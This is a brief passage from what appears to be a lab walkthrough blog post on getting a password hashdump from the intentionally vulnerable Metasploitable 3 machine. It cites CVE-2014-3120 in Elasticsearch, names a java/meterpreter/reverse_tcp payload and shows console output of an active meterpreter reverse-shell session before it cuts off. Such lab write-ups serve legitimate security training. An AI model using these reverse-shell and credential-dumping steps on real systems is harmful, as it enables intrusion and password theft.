Metasploitable 3 - Hashdump without Authentication
Metasploitable 3 Getting a Hashdump without Authentication If you remember, in my Queen of Hearts post, I exploited vulnerability CVE-2014-3120 in Elasticsearch and sent a java/meterpreter/reverse_tcp payload. Going back to that session we can see the meterpreter commands available. msf exploit( script_mvel_rce ) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 2 meterpreter java/windows METASPLOITABLE3$ @ metasploitable3 10.23.10.200:4467 -> 10.20.10.23:49393 (10.20.10.23) msf exploit( script_mvel_rce ) > sessions 2 [*] Startin...